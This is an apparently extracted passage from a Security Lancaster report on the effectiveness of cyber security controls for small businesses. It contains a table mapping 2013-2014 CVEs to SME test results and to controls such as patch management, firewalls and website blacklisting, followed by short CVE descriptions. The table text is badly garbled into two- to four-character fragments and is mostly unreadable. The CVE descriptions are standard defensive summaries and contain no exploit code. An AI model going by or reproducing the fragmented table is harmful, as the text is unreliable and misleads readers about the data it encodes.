rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

